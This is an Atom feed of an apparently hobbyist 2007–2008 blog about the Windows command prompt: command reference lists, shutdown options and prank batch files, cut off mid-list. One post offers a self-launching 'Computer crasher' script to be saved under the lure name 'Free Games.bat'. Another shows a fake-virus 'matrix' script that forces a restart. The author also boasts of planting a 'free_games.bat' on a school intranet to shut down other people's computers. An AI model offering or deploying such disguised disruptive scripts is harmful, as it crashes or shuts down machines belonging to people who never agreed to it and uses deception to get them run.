<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-706833174719513528</id><updated>2012-02-16T17:42:21.535-08:00</updated><category term='prompt'/><category term='echo'/><category term='cmd prompt'/><category term='dannz'/><category term='matrix'/><category term='XP'/><category term='notepad'/><category term='shutdown'/><category term='command prompt'/><category term='bat'/><category term='open'/><category term='windows'/><category term='network'/><category term='cmd'/><category term='command'/><category term='.bat'/><category term='vista'/><category term='batch'/><title type='text'>Command prompt</title><subtitle type='html'>&lt;i&gt;Master the command prompt, control your network&lt;/i&gt;</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://windowscommandprompt.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/706833174719513528/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://windowscommandprompt.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Dannz</name><uri>http://www.blogger.com/profile/10760366497224672983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>9</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-706833174719513528.post-3462217925353302326</id><published>2008-01-01T13:56:00.000-08:00</published><updated>2008-01-01T13:59:45.680-08:00</updated><title type='text'>All vista cmd's</title><content type='html'>Just wanted to say happy new year and the best for 2008&lt;br /&gt;Here are all the vista command prefixes&lt;br /&gt;&lt;br /&gt;ASSOC          Displays or modifies file extension associations.&lt;br /&gt;ATTRIB         Displays or changes file attributes.&lt;br /&gt;BREAK          Sets or clears extended CTRL+C checking.&lt;br /&gt;BCDEDIT        Sets properties in boot database to control boot loading.&lt;br /&gt;CACLS          Displays or modifies access control lists (ACLs) of files.&lt;br /&gt;CALL           Calls one batch program from another.&lt;br /&gt;CD             Displays the name of or changes the current directory.&lt;br /&gt;CHCP           Displays or sets the active code page number.&lt;br /&gt;CHDIR          Displays the name of or changes the current directory.&lt;br /&gt;CHKDSK         Checks a disk and displays a status report.&lt;br /&gt;CHKNTFS        Displays or modifies the checking of disk at boot time.&lt;br /&gt;CLS            Clears the screen.&lt;br /&gt;CMD            Starts a new instance of the Windows command interpreter.&lt;br /&gt;COLOR          Sets the default console foreground and background colors.&lt;br /&gt;COMP           Compares the contents of two files or sets of files.&lt;br /&gt;COMPACT        Displays or alters the compression of files on NTFS partitions.&lt;br /&gt;CONVERT        Converts FAT volumes to NTFS.  You cannot convert the&lt;br /&gt;               current drive.&lt;br /&gt;COPY           Copies one or more files to another location.&lt;br /&gt;DATE           Displays or sets the date.&lt;br /&gt;DEL            Deletes one or more files.&lt;br /&gt;DIR            Displays a list of files and subdirectories in a directory.&lt;br /&gt;DISKCOMP       Compares the contents of two floppy disks.&lt;br /&gt;DISKCOPY       Copies the contents of one floppy disk to another.&lt;br /&gt;DISKPART       Displays or configures Disk Partition properties.&lt;br /&gt;DOSKEY         Edits command lines, recalls Windows commands, and&lt;br /&gt;               creates macros.&lt;br /&gt;DRIVERQUERY    Displays current device driver status and properties.&lt;br /&gt;ECHO           Displays messages, or turns command echoing on or off.&lt;br /&gt;ENDLOCAL       Ends localization of environment changes in a batch file.&lt;br /&gt;ERASE          Deletes one or more files.&lt;br /&gt;EXIT           Quits the CMD.EXE program (command interpreter).&lt;br /&gt;FC             Compares two files or sets of files, and displays the&lt;br /&gt;               differences between them.&lt;br /&gt;FIND           Searches for a text string in a file or files.&lt;br /&gt;FINDSTR        Searches for strings in files.&lt;br /&gt;FOR            Runs a specified command for each file in a set of files.&lt;br /&gt;FORMAT         Formats a disk for use with Windows.&lt;br /&gt;FSUTIL         Displays or configures the file system properties.&lt;br /&gt;FTYPE          Displays or modifies file types used in file extension&lt;br /&gt;               associations.&lt;br /&gt;GOTO           Directs the Windows command interpreter to a labeled line in&lt;br /&gt;               a batch program.&lt;br /&gt;GPRESULT       Displays Group Policy information for machine or user.&lt;br /&gt;GRAFTABL       Enables Windows to display an extended character set in&lt;br /&gt;               graphics mode.&lt;br /&gt;HELP           Provides Help information for Windows commands.&lt;br /&gt;ICACLS         Display, modify, backup, or restore ACLs for files and&lt;br /&gt;               directories.&lt;br /&gt;IF             Performs conditional processing in batch programs.&lt;br /&gt;LABEL          Creates, changes, or deletes the volume label of a disk.&lt;br /&gt;MD             Creates a directory.&lt;br /&gt;MKDIR          Creates a directory.&lt;br /&gt;MKLINK         Creates Symbolic Links and Hard Links&lt;br /&gt;MODE           Configures a system device.&lt;br /&gt;MORE           Displays output one screen at a time.&lt;br /&gt;MOVE           Moves one or more files from one directory to another&lt;br /&gt;               directory.&lt;br /&gt;OPENFILES      Displays files opened by remote users for a file share.&lt;br /&gt;PATH           Displays or sets a search path for executable files.&lt;br /&gt;PAUSE          Suspends processing of a batch file and displays a message.&lt;br /&gt;POPD           Restores the previous value of the current directory saved by&lt;br /&gt;               PUSHD.&lt;br /&gt;PRINT          Prints a text file.&lt;br /&gt;PROMPT         Changes the Windows command prompt.&lt;br /&gt;PUSHD          Saves the current directory then changes it.&lt;br /&gt;RD             Removes a directory.&lt;br /&gt;RECOVER        Recovers readable information from a bad or defective disk.&lt;br /&gt;REM            Records comments (remarks) in batch files or CONFIG.SYS.&lt;br /&gt;REN            Renames a file or files.&lt;br /&gt;RENAME         Renames a file or files.&lt;br /&gt;REPLACE        Replaces files.&lt;br /&gt;RMDIR          Removes a directory.&lt;br /&gt;ROBOCOPY       Advanced utility to copy files and directory trees&lt;br /&gt;SET            Displays, sets, or removes Windows environment variables.&lt;br /&gt;SETLOCAL       Begins localization of environment changes in a batch file.&lt;br /&gt;SC             Displays or configures services (background processes).&lt;br /&gt;SCHTASKS       Schedules commands and programs to run on a computer.&lt;br /&gt;SHIFT          Shifts the position of replaceable parameters in batch files.&lt;br /&gt;SHUTDOWN       Allows proper local or remote shutdown of machine.&lt;br /&gt;SORT           Sorts input.&lt;br /&gt;START          Starts a separate window to run a specified program or command.&lt;br /&gt;SUBST          Associates a path with a drive letter.&lt;br /&gt;SYSTEMINFO     Displays machine specific properties and configuration.&lt;br /&gt;TASKLIST       Displays all currently running tasks including services.&lt;br /&gt;TASKKILL       Kill or stop a running process or application.&lt;br /&gt;TIME           Displays or sets the system time.&lt;br /&gt;TITLE          Sets the window title for a CMD.EXE session.&lt;br /&gt;TREE           Graphically displays the directory structure of a drive or path.&lt;br /&gt;TYPE           Displays the contents of a text file.&lt;br /&gt;VER            Displays the Windows version.&lt;br /&gt;VERIFY         Tells Windows whether to verify that your files are written correctly to a disk.&lt;br /&gt;VOL            Displays a disk volume label and serial number.&lt;br /&gt;XCOPY          Copies files and directory trees.&lt;br /&gt;WMIC           Displays WMI information inside interactive command shell.&lt;br /&gt;&lt;br /&gt;Sorry about not lining it up, although i must admit it is easier to read&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/706833174719513528-3462217925353302326?l=windowscommandprompt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://windowscommandprompt.blogspot.com/feeds/3462217925353302326/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=706833174719513528&amp;postID=3462217925353302326' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/706833174719513528/posts/default/3462217925353302326'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/706833174719513528/posts/default/3462217925353302326'/><link rel='alternate' type='text/html' href='http://windowscommandprompt.blogspot.com/2008/01/all-vista-cmds.html' title='All vista cmd&apos;s'/><author><name>Dannz</name><uri>http://www.blogger.com/profile/10760366497224672983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-706833174719513528.post-1302358162133885329</id><published>2007-12-08T03:20:00.000-08:00</published><updated>2007-12-08T03:38:36.905-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='bat'/><category scheme='http://www.blogger.com/atom/ns#' term='batch'/><category scheme='http://www.blogger.com/atom/ns#' term='network'/><category scheme='http://www.blogger.com/atom/ns#' term='dannz'/><category scheme='http://www.blogger.com/atom/ns#' term='cmd'/><category scheme='http://www.blogger.com/atom/ns#' term='windows'/><category scheme='http://www.blogger.com/atom/ns#' term='prompt'/><category scheme='http://www.blogger.com/atom/ns#' term='cmd prompt'/><category scheme='http://www.blogger.com/atom/ns#' term='matrix'/><category scheme='http://www.blogger.com/atom/ns#' term='echo'/><category scheme='http://www.blogger.com/atom/ns#' term='.bat'/><category scheme='http://www.blogger.com/atom/ns#' term='vista'/><category scheme='http://www.blogger.com/atom/ns#' term='XP'/><category scheme='http://www.blogger.com/atom/ns#' term='command'/><category scheme='http://www.blogger.com/atom/ns#' term='shutdown'/><category scheme='http://www.blogger.com/atom/ns#' term='command prompt'/><title type='text'>Computer crasher, opens infinity times (use carefully)</title><content type='html'>Save the small command file below as 'Free Games.bat' &lt;span style="font-weight: bold;"&gt;on the desktop&lt;/span&gt; and then just click on it to crash your computer (it opens itself infinity times)&lt;br /&gt;&lt;br /&gt;Edit the code and the name as you wish (if you change the name, the code must change and visa versa)&lt;br /&gt;&lt;br /&gt;'&lt;br /&gt;&lt;pre&gt;echo off&lt;br /&gt;cls&lt;br /&gt;start desktop\Free Games.bat&lt;br /&gt;&lt;br /&gt;'&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/706833174719513528-1302358162133885329?l=windowscommandprompt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://windowscommandprompt.blogspot.com/feeds/1302358162133885329/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=706833174719513528&amp;postID=1302358162133885329' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/706833174719513528/posts/default/1302358162133885329'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/706833174719513528/posts/default/1302358162133885329'/><link rel='alternate' type='text/html' href='http://windowscommandprompt.blogspot.com/2007/12/computer-crasher-opens-infinity-times.html' title='Computer crasher, opens infinity times (use carefully)'/><author><name>Dannz</name><uri>http://www.blogger.com/profile/10760366497224672983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-706833174719513528.post-7698071324479066969</id><published>2007-12-08T03:13:00.000-08:00</published><updated>2007-12-08T03:38:36.908-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='bat'/><category scheme='http://www.blogger.com/atom/ns#' term='batch'/><category scheme='http://www.blogger.com/atom/ns#' term='network'/><category scheme='http://www.blogger.com/atom/ns#' term='dannz'/><category scheme='http://www.blogger.com/atom/ns#' term='cmd'/><category scheme='http://www.blogger.com/atom/ns#' term='windows'/><category scheme='http://www.blogger.com/atom/ns#' term='prompt'/><category scheme='http://www.blogger.com/atom/ns#' term='cmd prompt'/><category scheme='http://www.blogger.com/atom/ns#' term='matrix'/><category scheme='http://www.blogger.com/atom/ns#' term='echo'/><category scheme='http://www.blogger.com/atom/ns#' term='.bat'/><category scheme='http://www.blogger.com/atom/ns#' term='vista'/><category scheme='http://www.blogger.com/atom/ns#' term='XP'/><category scheme='http://www.blogger.com/atom/ns#' term='command'/><category scheme='http://www.blogger.com/atom/ns#' term='shutdown'/><category scheme='http://www.blogger.com/atom/ns#' term='command prompt'/><title type='text'>A matrix batch file i created</title><content type='html'>Simply copy this into your own document and save it, but note the file forces the computer to shutdown after running (you can change this if you want)&lt;br /&gt;&lt;br /&gt;'&lt;br /&gt;&lt;pre&gt;title The matrix console&lt;br /&gt;color a&lt;br /&gt;echo off&lt;br /&gt;cls&lt;br /&gt;echo Welcome to the matrix&lt;br /&gt;pause&lt;br /&gt;echo Initializing agents&lt;br /&gt;echo .&lt;br /&gt;echo .&lt;br /&gt;echo .&lt;br /&gt;echo completed&lt;br /&gt;pause&lt;br /&gt;echo retrieving mission statistics&lt;br /&gt;echo .&lt;br /&gt;echo .&lt;br /&gt;echo .&lt;br /&gt;echo completed&lt;br /&gt;pause&lt;br /&gt;echo activating tracking chips&lt;br /&gt;echo .&lt;br /&gt;echo .&lt;br /&gt;echo .&lt;br /&gt;echo completed&lt;br /&gt;&lt;br /&gt;echo The current GMT time is&lt;br /&gt;time /t&lt;br /&gt;pause&lt;br /&gt;cls&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;echo A super virus has been found on the system&lt;br /&gt;echo .&lt;br /&gt;echo Fighting super virus&lt;br /&gt;echo .&lt;br /&gt;echo Super virus defeated&lt;br /&gt;pause&lt;br /&gt;cls&lt;br /&gt;&lt;br /&gt;echo The computer will now restart for safety measures&lt;br /&gt;pause&lt;br /&gt;&lt;br /&gt;shutdown -r -c "Restarting for safety measures" -t 60&lt;br /&gt;&lt;br /&gt;'&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/706833174719513528-7698071324479066969?l=windowscommandprompt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://windowscommandprompt.blogspot.com/feeds/7698071324479066969/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=706833174719513528&amp;postID=7698071324479066969' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/706833174719513528/posts/default/7698071324479066969'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/706833174719513528/posts/default/7698071324479066969'/><link rel='alternate' type='text/html' href='http://windowscommandprompt.blogspot.com/2007/12/matrix-batch-file-i-created.html' title='A matrix batch file i created'/><author><name>Dannz</name><uri>http://www.blogger.com/profile/10760366497224672983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-706833174719513528.post-559125557380010405</id><published>2007-12-08T03:11:00.000-08:00</published><updated>2007-12-08T03:38:36.922-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='bat'/><category scheme='http://www.blogger.com/atom/ns#' term='batch'/><category scheme='http://www.blogger.com/atom/ns#' term='network'/><category scheme='http://www.blogger.com/atom/ns#' term='dannz'/><category scheme='http://www.blogger.com/atom/ns#' term='cmd'/><category scheme='http://www.blogger.com/atom/ns#' term='windows'/><category scheme='http://www.blogger.com/atom/ns#' term='prompt'/><category scheme='http://www.blogger.com/atom/ns#' term='cmd prompt'/><category scheme='http://www.blogger.com/atom/ns#' term='matrix'/><category scheme='http://www.blogger.com/atom/ns#' term='echo'/><category scheme='http://www.blogger.com/atom/ns#' term='.bat'/><category scheme='http://www.blogger.com/atom/ns#' term='vista'/><category scheme='http://www.blogger.com/atom/ns#' term='XP'/><category scheme='http://www.blogger.com/atom/ns#' term='command'/><category scheme='http://www.blogger.com/atom/ns#' term='shutdown'/><category scheme='http://www.blogger.com/atom/ns#' term='command prompt'/><title type='text'>Echo</title><content type='html'>The command echo can be used comically and seriously on the cmd prompt&lt;br /&gt;This is the default&lt;br /&gt;&lt;br /&gt;echo 'put your message here'&lt;br /&gt;&lt;br /&gt;If you want to put it in a batch file, make sure to put delay directly after it, else the cmd will close back down&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/706833174719513528-559125557380010405?l=windowscommandprompt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://windowscommandprompt.blogspot.com/feeds/559125557380010405/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=706833174719513528&amp;postID=559125557380010405' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/706833174719513528/posts/default/559125557380010405'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/706833174719513528/posts/default/559125557380010405'/><link rel='alternate' type='text/html' href='http://windowscommandprompt.blogspot.com/2007/12/echo.html' title='Echo'/><author><name>Dannz</name><uri>http://www.blogger.com/profile/10760366497224672983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-706833174719513528.post-5481404797591197415</id><published>2007-12-08T03:03:00.000-08:00</published><updated>2007-12-08T03:38:36.925-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='bat'/><category scheme='http://www.blogger.com/atom/ns#' term='batch'/><category scheme='http://www.blogger.com/atom/ns#' term='network'/><category scheme='http://www.blogger.com/atom/ns#' term='dannz'/><category scheme='http://www.blogger.com/atom/ns#' term='cmd'/><category scheme='http://www.blogger.com/atom/ns#' term='windows'/><category scheme='http://www.blogger.com/atom/ns#' term='prompt'/><category scheme='http://www.blogger.com/atom/ns#' term='cmd prompt'/><category scheme='http://www.blogger.com/atom/ns#' term='matrix'/><category scheme='http://www.blogger.com/atom/ns#' term='echo'/><category scheme='http://www.blogger.com/atom/ns#' term='.bat'/><category scheme='http://www.blogger.com/atom/ns#' term='vista'/><category scheme='http://www.blogger.com/atom/ns#' term='XP'/><category scheme='http://www.blogger.com/atom/ns#' term='command'/><category scheme='http://www.blogger.com/atom/ns#' term='shutdown'/><category scheme='http://www.blogger.com/atom/ns#' term='command prompt'/><title type='text'>Putting your commands into a  batch file</title><content type='html'>Now, you may have been wondering, what is the point in doing this when it could well be faster getting to the shortcut?&lt;br /&gt;Well, you can put your commands into a file that can be run, meaning it is much faster than getting the shortcut&lt;br /&gt;&lt;br /&gt;To do this, open a notepad file and put in your commands (one line per command)&lt;br /&gt;If you want to create a sequence, add 'delay' in between two commands (on its own line still), this will prompt for the user to press any key to continue&lt;br /&gt;&lt;br /&gt;Now, once you have put &lt;span style="font-weight: bold;"&gt;all&lt;/span&gt; of the commands in, save the file as 'name.bat' (obviously, without the quotes. This will save the file as a batch file, which are run through command prompt.&lt;br /&gt;&lt;br /&gt;For example, once on the school network i created a batch file name 'free_games.bat' and put it on the intranet, of course, as you can guess many people clicked on it&lt;br /&gt;The batch file told them they were not allowed near this resource and shutdown there computer&lt;br /&gt;It was a great laugh&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/706833174719513528-5481404797591197415?l=windowscommandprompt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://windowscommandprompt.blogspot.com/feeds/5481404797591197415/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=706833174719513528&amp;postID=5481404797591197415' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/706833174719513528/posts/default/5481404797591197415'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/706833174719513528/posts/default/5481404797591197415'/><link rel='alternate' type='text/html' href='http://windowscommandprompt.blogspot.com/2007/12/putting-your-sequence-of-events-into.html' title='Putting your commands into a  batch file'/><author><name>Dannz</name><uri>http://www.blogger.com/profile/10760366497224672983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-706833174719513528.post-961644879665448080</id><published>2007-12-08T02:57:00.000-08:00</published><updated>2007-12-08T03:38:36.927-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='bat'/><category scheme='http://www.blogger.com/atom/ns#' term='batch'/><category scheme='http://www.blogger.com/atom/ns#' term='network'/><category scheme='http://www.blogger.com/atom/ns#' term='dannz'/><category scheme='http://www.blogger.com/atom/ns#' term='cmd'/><category scheme='http://www.blogger.com/atom/ns#' term='windows'/><category scheme='http://www.blogger.com/atom/ns#' term='prompt'/><category scheme='http://www.blogger.com/atom/ns#' term='cmd prompt'/><category scheme='http://www.blogger.com/atom/ns#' term='matrix'/><category scheme='http://www.blogger.com/atom/ns#' term='echo'/><category scheme='http://www.blogger.com/atom/ns#' term='.bat'/><category scheme='http://www.blogger.com/atom/ns#' term='vista'/><category scheme='http://www.blogger.com/atom/ns#' term='XP'/><category scheme='http://www.blogger.com/atom/ns#' term='command'/><category scheme='http://www.blogger.com/atom/ns#' term='shutdown'/><category scheme='http://www.blogger.com/atom/ns#' term='command prompt'/><title type='text'>Shutdown commands</title><content type='html'>One of the most powerful commands in the cmd is shutdown&lt;br /&gt;Here are the basic commands&lt;br /&gt;&lt;br /&gt;shutdown /s (shuts down the computer)&lt;br /&gt;shutdown /l (logs you off)&lt;br /&gt;shutdown /r (reboots)&lt;br /&gt;shutdown //m *name of computer* (shuts down the named computer - a network command)&lt;br /&gt;shutdown /a (aborts a shutdown, very useful)&lt;br /&gt;&lt;br /&gt;Some extras to add on (can be added to any of these)&lt;br /&gt;&lt;br /&gt;-c 'leave a comment here' (Allows you to show a comment when the command is being run, include the quotes if there is more than one letter)&lt;br /&gt;-t # (sets a countdown, replace # with a number of seconds)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/706833174719513528-961644879665448080?l=windowscommandprompt.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://windowscommandprompt.blogspot.com/feeds/961644879665448080/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=706833174719513528&amp;postID=961644879665448080' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/706833174719513528/posts/default/961644879665448080'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/706833174719513528/posts/default/961644879665448080'/><link rel='alternate' type='text/html' href='http://windowscommandprompt.blogspot.com/2007/12/shutdown-commands.html' title='Shutdown commands'/><author><name>Dannz</name><uri>http://www.blogger.com/profile/10760366497224672983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-706833174719513528.post-3248918859170203112</id><published>2007-12-08T02:49:00.000-08:00</published><updated>2007-12-08T03:38:36.930-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='bat'/><category scheme='http://www.blogger.com/atom/ns#' term='batch'/><category scheme='http://www.blogger.com/atom/ns#' term='network'/><category scheme='http://www.blogger.com/atom/ns#' term='dannz'/><category scheme='http://www.blogger.com/atom/ns#' term='cmd'/><category scheme='http://www.blogger.com/atom/ns#' term='windows'/><category scheme='http://www.blogger.com/atom/ns#' term='prompt'/><category scheme='http://www.blogger.com/atom/ns#' term='cmd prompt'/><category scheme='http://www.blogger.com/atom/ns#' term='matrix'/><category scheme='http://www.blogger.com/atom/ns#' term='echo'/><category scheme='http://www.blogger.com/atom/ns#' term='.bat'/><category scheme='http://www.blogger.com/atom/ns#' term='vista'/><category scheme='http://www.blogger.com/atom/ns#' term='XP'/><category scheme='http://www.blogger.com/atom/ns#' term='command'/><category scheme='http://www.blogger.com/atom/ns#' term='shutdown'/><category scheme='http://www.blogger.com/atom/ns#' term='command prompt'/><title type='text'>All commands (advanced)</title><content type='html'>&lt;span style="font-weight: bold;"&gt;&lt;span style="font-weight: bold;"&gt;Note : these commands are all for windows xp and below, they can be found by typing 'help' in the cmd console&lt;br /&gt;Also, to find out more about each command, type the command with /? after it (e.g. CD /?)&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;AT&lt;/span&gt;       Schedules commands and programs to run on a computer.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; ATTRIB&lt;/span&gt;   Displays or changes file attributes.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; BREAK&lt;/span&gt;    Sets or clears extended CTRL+C checking.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; CACLS&lt;/span&gt;    Displays or modifies access control lists (ACLs) of files.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; CALL&lt;/span&gt;     Calls one batch program from another.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; CD&lt;/span&gt;       Displays the name of or changes the current directory.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; CHCP&lt;/span&gt;     Displays or sets the active code page number.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; CHDIR&lt;/span&gt;    Displays the name of or changes the current directory.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; CHKDSK&lt;/span&gt;   Checks a disk and displays a status report.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; CHKNTFS&lt;/span&gt;  Displays or modifies the checking of disk at boot time.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; CLS&lt;/span&gt;      Clears the console&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; CMD&lt;/span&gt;      Starts a new session of the Windows command prompt&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; COLOR&lt;/span&gt;    Sets the default console foreground and background colors.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; COMP&lt;/span&gt;     Compares the contents of two files or sets of files.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; COMPACT&lt;/span&gt;  Displays or alters the compression of files on NTFS partitions.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; CONVERT&lt;/span&gt;  Converts FAT volumes to NTFS.  You cannot convert the&lt;br /&gt;         current drive.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; COPY&lt;/span&gt;     Copies one or more files to another location.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; DATE&lt;/span&gt;     Displays or sets the date.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; DEL&lt;/span&gt;      Deletes one or more files.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; DIR&lt;/span&gt;      Displays a list of files and subdirectories in a directory.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; DISKCOMP&lt;/span&gt; Compares the contents of two floppy disks.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; DISKCOPY&lt;/span&gt; Copies the contents of one floppy disk to another.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; DOSKEY&lt;/span&gt;   Edits command lines, recalls Windows commands, and creates macros.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; ECHO&lt;/span&gt;     Displays messages, or turns command echoing on or off.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; ENDLOCAL&lt;/span&gt; Ends localization of environment changes in a batch file.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; ERASE&lt;/span&gt;    Deletes one or more files.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; EXIT&lt;/span&gt;     Quits the CMD.EXE program (command interpreter).&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; FC&lt;/span&gt;       Compares two files or sets of files, and displays the differences&lt;br /&gt;         between them.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; FIND&lt;/span&gt;     Searches for a text string in a file or files.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; FINDSTR&lt;/span&gt;  Searches for strings in files.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; FOR&lt;/span&gt;      Runs a specified command for each file in a set of files.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; FORMAT&lt;/span&gt;   Formats a disk for use with Windows.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; FTYPE&lt;/span&gt;    Displays or modifies file types used in file extension associations.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; GOTO&lt;/span&gt;     Directs the Windows command interpreter to a labeled line in a&lt;br /&gt;         batch program.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; GRAFTABL&lt;/span&gt; Enables Windows to display an extended character set in graphics&lt;br /&gt;         mode.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; HELP&lt;/span&gt;     Provides Help information for Windows commands.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; IF&lt;/span&gt;       Performs conditional processing in batch programs.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; LABEL&lt;/span&gt;    Creates, changes, or deletes the volume label of a disk.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; MD&lt;/span&gt;       Creates a directory.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; MKDIR&lt;/span&gt;    Creates a directory.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; MODE&lt;/span&gt;     Configures a system device.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; MORE&lt;/span&gt;     Displays output one screen at a time.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt; MOVE&lt;/span&gt;     